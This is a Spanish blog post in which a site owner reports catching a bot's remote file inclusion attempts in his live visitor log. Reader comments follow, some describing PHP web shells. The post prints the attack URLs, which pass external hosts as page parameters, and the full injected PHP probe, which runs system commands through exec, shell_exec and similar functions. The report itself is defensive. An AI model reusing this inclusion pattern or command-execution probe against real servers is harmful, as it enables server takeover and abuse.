El bot atacando infraganti

Me puse a ver las visitas online que había hace un ratito, y una de las particularidades de dicho script es que me dice que sección estan visitando en ese momento, como un log, para ver donde está cada uno en ese momento o que noticia se está viendo.

Muchas veces me encuentro con los spiders de Google o MSN inspeccionando el sitio, o con usuarios de este mismo blog, pero hoy me encontré con uno muy particular que decía algo así:

Anónimo 211.43.222.218 66 seg
http://www.fabio.com.ar/verpost.php?id_noticia=http://sabo.i-s-o.net/.
libwww-perl/5.65


¿libwww-perl? eso no es un browser, ¿pasar una url como variable? papito, eso todavía funciona pero fue cochino de tu parte :P

Y si, me encontré con varios intentos de XSS (Cross-site Scripting), pero lo más interesante del caso es que proviene de múltiples IPs, es obvio que alguien está queriendo divertirse con este blog con unos lindos proxys de por medio para que no lo agarre y es muy probable, también, que lo esté haciendo con un bot que hace todo esto por él (lammer)



IPs: 211.43.222.218
194.210.29.33
62.67.246.252
84.234.115.2
200.94.196.146
87.229.14.10


Ataques: http://www.fabio.com.ar/verpost.php?id_noticia=http://sabo.i-s-o.net/. http://www.fabio.com.ar/index.php?tema=http://www.petcall.eu/nav?

URLs infectadas: http://sabo.i-s-o.net/
http://www.petcall.eu/nav?


Script atacante:

$ker = @php_uname();
$osx = @PHP_OS;
echo "f7f32504cabcb48c21030c024c6e5c1a
"; // md5('xeQt'); echo "Uname:$ker
"; echo "SySOs:$osx
"; if ($osx == "WINNT") { $xeQt="ipconfig -a"; } else { $xeQt="id"; } $hitemup=ex($xeQt); echo $hitemup; function ex($cfe) { $res = ''; if (!empty($cfe)) { if(function_exists('exec')) { @exec($cfe,$res); $res = join("n",$res); } elseif(function_exists('shell_exec')) { $res = @shell_exec($cfe); } elseif(function_exists('system')) { @ob_start(); @system($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(function_exists('passthru')) { @ob_start(); @passthru($cfe); $res = @ob_get_contents(); @ob_end_clean(); } elseif(@is_resource($f = @popen($cfe,"r"))) { $res = ""; while(!@feof($f)) { $res .= @fread($f,1024); } @pclose($f); } } return $res; }


De algo sirvió el script para ver visitantes online, pude identificar un ataque en pleno momento :P no es que me de alegría, pero por lo menos sirve para ver por dónde te estan buscando.

Categoría: Programación Etiquetas:  
Otros posts que podrían llegar a gustarte...

Comentarios

  • the kaker    

    uy me descubrieron!

    • Responder
    • Citar
    • Comentado:
  • Tere    

    NO entendí nada, pero por las dudas, yo no fui!!

    • Responder
    • Citar
    • Comentado:
  • david    

    es evidente que hay gente muy estúpida y muy al pedo, angustiosamente sobran, nos vemos suerte.

    • Responder
    • Citar
    • Comentado:
  • Danbat    

    Ahora explicalo en lenguaje pwned, porque de 1337 no cazo una. :D

    • Responder
    • Citar
    • Comentado:
  • Neo    

    Seguramente sean bots spammers, o algo así. Capas bots que te auto defacean la web y te ponen muchos banners. Anda a saber jaja

    • Responder
    • Citar
    • Comentado:
  • R4F431    

    Estaría bueno un script para romperles el culo a patadas, creo que va a ser mi tesis. :D

    • Responder
    • Citar
    • Comentado:
  • Qua-ker    

    Mierda me encontraron!

    • Responder
    • Citar
    • Comentado:
  • pata    

    Me puse a ver las visitas online que había hace un ratito, y una de las particularidades de dicho

    Hasta aca entendí

    ahora bien.....

    edit pata.bat
    @echo off
    dir *.* /p /w
    cls

    :D

    Es todo lo que se... y ensima.. no funca mas
    .. creo

    • Responder
    • Citar
    • Comentado:
  • Pichu    

    Que hijos de p&ta que son...que ganas de joder...
    Legalmente en nuestro pais se puede hacer algo al respecto? Estaria bueno un post sobre eso.
    Muy buena la pagina fabio Guiño , todavia no pude hacer la fondue

    • Responder
    • Citar
    • Comentado:
  • Es Kirchner, que después de Jorge Asís, te viene a buscar a vos desde su sistema operativo del pingüinito....... :D

    • Responder
    • Citar
    • Comentado:
  • ocampoart    

    ¡¡¡¡ Pepe el Toro es inocente !!! ; ¡¡¡¡ Pepe el Toro es inocente !!! , ¡¡¡¡ Pepe el Toro es inocente !!!

    • Responder
    • Citar
    • Comentado:
  • GFer    

    Peluchin's revenge!!! :D:D:D:D

    • Responder
    • Citar
    • Comentado:
  • emiliano    

    Claro, yo pienso exactamente lo mismo!

    • Responder
    • Citar
    • Comentado:
  • Para mí, fue Julián... es que ¡le echó la culpa a nuestro presidente!

    :D:D:D:D:D

    Nah, mentira!

    Fijate si no fueron los hackers a sueldo del Ministerio del Interior

    • Responder
    • Citar
    • Comentado:
  • Alejandro    

    La palabra que mas describio a esta persona es una que escribio fabio....!
    Lamer!

    • Responder
    • Citar
    • Comentado:
  • La otra vez hicieron lo mismo, pero con una pagina que hosteo.

    Investigando, me puse a bajar el dichoso script que aparecia en los logs.

    La verdad, cada vez se esmeran mas estos pibes.
    Parecia una mini consola.
    Tenias para crear, borrar, editar archivos y directorios, subir archivos por ftp, bajar por ftp a la maquina infectada, conectarte a la DB, browsear las tablas de la DB, ver procesos, MATAR procesos (claro, solo serian los tuyos o los de apache como mucho, que no es poco), ver la info de PHP, cambiar permisos, etc.

    En fin, toda una navajita suiza en php.

    Igual debe ser conocida, pero yo la vi por primera vez mirando ese archivo de log.

    En fin, que gente esta....

    • Responder
    • Citar
    • Comentado:
  • Fabio    


    |Lord_Zoo| dijo:

    La otra vez hicieron lo mismo, pero con una pagina que hosteo.

    Investigando, me puse a bajar el dichoso script que aparecia en los logs.

    La verdad, cada vez se esmeran mas estos pibes.
    Parecia una mini consola.
    Tenias para crear, borrar, editar archivos y directorios, subir archivos por ftp, bajar por ftp a la maquina infectada, conectarte a la DB, browsear las tablas de la DB, ver procesos, MATAR procesos (claro, solo serian los tuyos o los de apache como mucho, que no es poco), ver la info de PHP, cambiar permisos, etc.

    En fin, toda una navajita suiza en php.

    Igual debe ser conocida, pero yo la vi por primera vez mirando ese archivo de log.

    En fin, que gente esta....


    ese me lo inyectaron en un server donde tenía una carpeta con permisos 777 por una vez que no se por qué cuernos lo necesitaba, así que nunca dejen una 777 perdida por ahí! :P

    • Responder
    • Citar
    • Comentado:
  • marto    

    Hay una par de php shell.
    Las pueden encontrar en varios lugares, pero creo que en milw0rm están la mayoría (en la parte de foro).

    Hay scripts mas completos, que buscan en toda la página los POST y GET y algunos más y los va probando de a uno, pero ése no lo encontré "in the wild", era privado.

    La verdad es que cada vez me rompe más las pelotas los servidores de hosteo, si no le prestás atención cada 10' a todas las vulnerabildiades que salen, te puden ownear hasta el servidor completo, y metete el IDS, el iptables y le bastión de seguridad física en el orto.

    • Responder
    • Citar
    • Comentado:
  • Anónimo    

    Para mi que son los de Wikipedia que vuelven a la carga!!!!!

    • Responder
    • Citar
    • Comentado:
  • Che...¿no querés explicar para la audiencia, y de forma que un niño de 5 años lo entienda que corchos descubriste?!?!?! :D :D :D
    Digo, para no quedarnos colgados del pincel y sin la escalera!

    • Responder
    • Citar
    • Comentado:
  • silvio    

    Echale la culpa a los rusos.
    O a bin laden.
    tiene onda echar la culpa a paises raros :D

    • Responder
    • Citar
    • Comentado:
  • Fabio    


    asur owned :P dijo:

    Che...¿no querés explicar para la audiencia, y de forma que un niño de 5 años lo entienda que corchos descubriste?!?!?! :D :D :D
    Digo, para no quedarnos colgados del pincel y sin la escalera!


    dependiendo la configuración del server y el script PHP que uses para tu blog, con este tipo de "recursos" pueden "inyectarte" ese código en el tuyo, ejecutarlo y obtener permisos de escritura o ejecución dentro de tu server.

    de esta forma lo toman de "rehén" por un rato, pueden borrar todo o simplemente usarlo como puente para otro tipo de actividad (ilícita habitualmente) como scams, phishing, etc.

    • Responder
    • Citar
    • Comentado:
  • "phishing"

    Eso consiste en ir a mear gente servidores o sitios web?










    no lo pude evitar ajajajaa

    • Responder
    • Citar
    • Comentado:
  • jajaj.. bueno.. los proto-hackers estan a la hora del día no?
    Ahora una consulta, en el caso de que yo pruebe vulnerabilidades y boludeces como los PHP Shell Code en MIS webs, y tenga acceso a mysqls, ftps y publicshtmls de otros... que hago? aviso al isp? aviso al dueño del sitio? o posteo sobre la bosta que es el isp? (Dattatec)

    • Responder
    • Citar
    • Comentado:
  • Lau.-    

    Estuve leyendo este blog un rato. No termino de entender el porqué de tanta indignación con respecto a la gente que quiere probar sus truquitos, ver cuán vulnerable es x sitio... me parece que todo el que se mete en alguna empresa en internet sabe que son las reglas del juego... Por otra parte, me sorprende también que la gente se indigne porque las personas quieran averiguar la contraseña de alguien... a mí no me gustaría que entren a mi correo, pero no tengo nada que esconder, no sé si me enojaria por ello pero sobre todo, entiendo esa curiosidad de leer lo que escribe otro cuando nadie lo mira! Sin llegar a niveles de enfermedad no? porque los post compulsivos en que pedían hackear contraseñas eran bastante enfermisos... Pero ahora son los mails, antes era el diario íntimo de una hermana, etc etc........... es un clásico.

    • Responder
    • Citar
    • Comentado:

Deje su comentario:

Tranquilo, su email nunca será revelado.
La gente de bien tiene URL, no se olvide del http/https
Para evitar bots, si se tardó mucho en leer la nota seguramente no sirva y tenga que intentar dos veces

Negrita Cursiva Imagen Enlace


comentarios ofensivos o que no hagan al enriquecimiento del post serán borrados/editados por el administrador